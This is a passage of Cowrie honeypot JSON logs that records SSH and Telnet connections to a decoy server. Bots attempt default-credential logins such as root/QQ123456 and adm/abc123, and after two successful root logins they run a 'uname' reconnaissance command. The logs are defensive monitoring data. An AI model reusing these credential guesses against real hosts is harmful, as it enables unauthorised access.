nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:48.466946Z","src_ip":"212.227.235.229","session":"2560a8b827f1"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:49.454275Z","src_ip":"212.227.235.229","session":"2560a8b827f1"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:50.601012Z","src_ip":"212.227.235.229","session":"2560a8b827f1"}
{"eventid":"cowrie.session.closed","duration":32.18402171134949,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:52.688012Z","src_ip":"212.227.235.229","session":"be55e330e3ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43016,"dst_ip":"1.2.3.4","dst_port":22,"session":"3591934bd0d3","protocol":"ssh","message":"New connection: 212.227.125.160:43016 (1.2.3.4:22) [session: 3591934bd0d3]","sensor":"my-vps","timestamp":"2025-08-28T06:09:56.974803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:56.975603Z","src_ip":"212.227.125.160","session":"3591934bd0d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:57.084315Z","src_ip":"212.227.125.160","session":"3591934bd0d3"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:57.554384Z","src_ip":"212.227.125.160","session":"3591934bd0d3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:58.661455Z","src_ip":"212.227.125.160","session":"3591934bd0d3"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":36390,"dst_ip":"1.2.3.4","dst_port":23,"session":"57262d5c4c14","protocol":"telnet","message":"New connection: 8.222.212.69:36390 (1.2.3.4:23) [session: 57262d5c4c14]","sensor":"my-vps","timestamp":"2025-08-28T06:10:03.375499Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50606,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa69099740de","protocol":"ssh","message":"New connection: 212.227.235.229:50606 (1.2.3.4:22) [session: aa69099740de]","sensor":"my-vps","timestamp":"2025-08-28T06:10:06.386466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:06.387170Z","src_ip":"212.227.235.229","session":"aa69099740de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:10:06.532230Z","src_ip":"212.227.235.229","session":"aa69099740de"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:10:07.159079Z","src_ip":"212.227.235.229","session":"aa69099740de"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:08.307247Z","src_ip":"212.227.235.229","session":"aa69099740de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34330,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1e763c91909","protocol":"ssh","message":"New connection: 212.227.125.160:34330 (1.2.3.4:22) [session: a1e763c91909]","sensor":"my-vps","timestamp":"2025-08-28T06:10:11.981583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:11.982358Z","src_ip":"212.227.125.160","session":"a1e763c91909"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:10:12.089345Z","src_ip":"212.227.125.160","session":"a1e763c91909"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:10:12.456454Z","src_ip":"212.227.125.160","session":"a1e763c91909"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:10:12.690107Z","src_ip":"212.227.125.160","session":"a1e763c91909"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:10:12.690820Z","src_ip":"212.227.125.160","session":"a1e763c91909"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:12.807128Z","src_ip":"212.227.125.160","session":"a1e763c91909"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:12.808214Z","src_ip":"212.227.125.160","session":"a1e763c91909"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":45356,"dst_ip":"1.2.3.4","dst_port":22,"session":"60347fac84e7","protocol":"ssh","message":"New connection: 80.94.95.15:45356 (1.2.3.4:22) [session: 60347fac84e7]","sensor":"my-vps","timestamp":"2025-08-28T06:10:13.396467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:10:13.397109Z","src_ip":"80.94.95.15","session":"60347fac84e7"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:10:13.448755Z","src_ip":"80.94.95.15","session":"60347fac84e7"}
{"eventid":"cowrie.login.failed","username":"adm","password":"123456","message":"login attempt [adm/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:10:13.749376Z","src_ip":"80.94.95.15","session":"60347fac84e7"}
{"eventid":"cowrie.login.failed","username":"adm","password":"abc123","message":"login attempt [adm/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:10:14.810694Z","src_ip":"80.94.95.15","session":"60347fac84e7"}
{"eventid":"cowrie.login.failed","username":"adm","password":"abcd123","message":"login attempt [adm/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:10:15.879242Z","src_ip":"80.94.95.15","session":"60347fac84e7"}
{"eventid":"cowrie.login.failed","username":"adm","password":"abcd1234","message":"login attempt [adm/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:10:16.933175Z","src_ip":"80.94.95.15","session":"60347fac84e7"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":44144,"dst_ip":"1.2.3.4","dst_port":23,"session":"ac4a3e224a0d","protocol":"telnet","message":"New connection: 8.222.212.69:44144 (1.2.3.4:23) [session: ac4a3e224a0d]","sensor":"my-vps","timestamp":"2025-08-28T06:10:17.111575Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45810,"dst_ip":"1.2.3.4","dst_port":22,"session":"e98c412e930e","protocol":"ssh","message":"New connection: 212.227.235.229:45810 (1.2.3.4:22) [session: e98c412e930e]","sensor":"my-vps","timestamp":"2025-08-28T06:10:17.963978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:17.965109Z","src_ip":"212.227.235.229","session":"e98c412e930e"}
{"eventid":"cowrie.login.failed","username":"adm","password":"abc1234","message":"login attempt [adm/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:10:18.001782Z","src_ip":"80.94.95.15","session":"60347fac84e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:10:18.109992Z","src_ip":"212.227.235.229","session":"e98c412e930e"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:10:18.574069Z","src_ip":"212.227.235.229","session":"e98c412e930e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:10:18.987649Z","src_ip":"212.227.235.229","session":"e98c412e930e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:10:18.988420Z","src_ip":"212.227.235.229","session":"e98c412e930e"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:19.054603Z","src_ip":"80.94.95.15","session":"60347fac84e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:19.134837Z","src_ip":"212.227.235.229","session":"e98c412e930e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:19.136584Z","src_ip":"212.227.235.229","session":"e98c412e930e"}
{"eventid":"cowrie.session.closed","duration":31.27844214439392,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:19.360870Z","src_ip":"8.222.212.69","session":"dcc745572a89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32630,"dst_ip":"1.2.3.4","dst_port":22,"session":"75caf85bdd89","protocol":"ssh","message":"New connection: 212.227.235.229:32630 (1.2.3.4:22) [session: 75caf85bdd89]","sensor":"my-vps","timestamp":"2025-08-28T06:10:32.249192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:32.605791Z","src_ip":"212.227.235.229","session":"75caf85bdd89"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T06:10:32.606585Z","src_ip":"212.227.235.229","session":"75caf85bdd89"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:33.826151Z","src_ip":"212.227.235.229","session":"75caf85bdd89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32646,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea261ea4c2bf","protocol":"ssh","message":"New connection: 212.227.235.229:32646 (1.2.3.4:22) [session: ea261ea4c2bf]","sensor":"my-vps","timestamp":"2025-08-28T06:10:34.085556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:34.443494Z","src_ip":"212.227.235.229","session":"ea261ea4c2bf"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T06:10:34.445540Z","src_ip":"212.227.235.229","session":"ea261ea4c2bf"}
{"eventid":"cowrie.session.closed","duration":31.79035210609436,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:35.165786Z","src_ip":"8.222.212.69","session":"57262d5c4c14"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:35.636701Z","src_ip":"212.227.235.229","session":"ea261ea4c2bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32658,"dst_ip":"1.2.3.4","dst_port":22,"session":"687de7426ba2","protocol":"ssh","message":"New connection: 212.227.235.229:32658 (1.2.3.4:22) [session: 687de7426ba2]","sensor":"my-vps","timestamp":"2025-08-28T06:10:35.872759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:36.322286Z","src_ip":"212.227.235.229","session":"687de7426ba2"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T06:10:36.323404Z","src_ip":"212.227.235.229","session":"687de7426ba2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59575,"dst_ip":"1.2.3.4","dst_port":23,"session":"83955fd22198","protocol":"telnet","message":"New connection: 212.227.125.160:59575 (1.2.3.4:23) [session: 83955fd22198]","sensor":"my-vps","timestamp":"2025-08-28T06:10:36.640934Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:10:37.458336Z","src_ip":"212.227.235.229","session":"687de7426ba2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59580,"dst_ip":"1.2.3.4","dst_port":23,"session":"e5f440d6fcba","protocol":"telnet","message":"New connection: 212.227.125.160:59580 (1.2.3.4:23) [session: e5f440d6fcba]","sensor":"my-vps","timestamp":"2025-08-28T06:10:40.745481Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55092,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9f7894d2016","protocol":"ssh","message":"New connection: 212.227.125.160:55092 (1.2.3.4:22) [session: b9f7894d2016]","sensor":"my-vps","timestamp":"2025-08-28T06:10:40.941418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:10:40.942302Z","src_ip":"212.227.125.160","session":"b9f7894d2016"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:10:41.045949Z","src_ip":"212.227.125.160","session":"b9f7894d2016"}
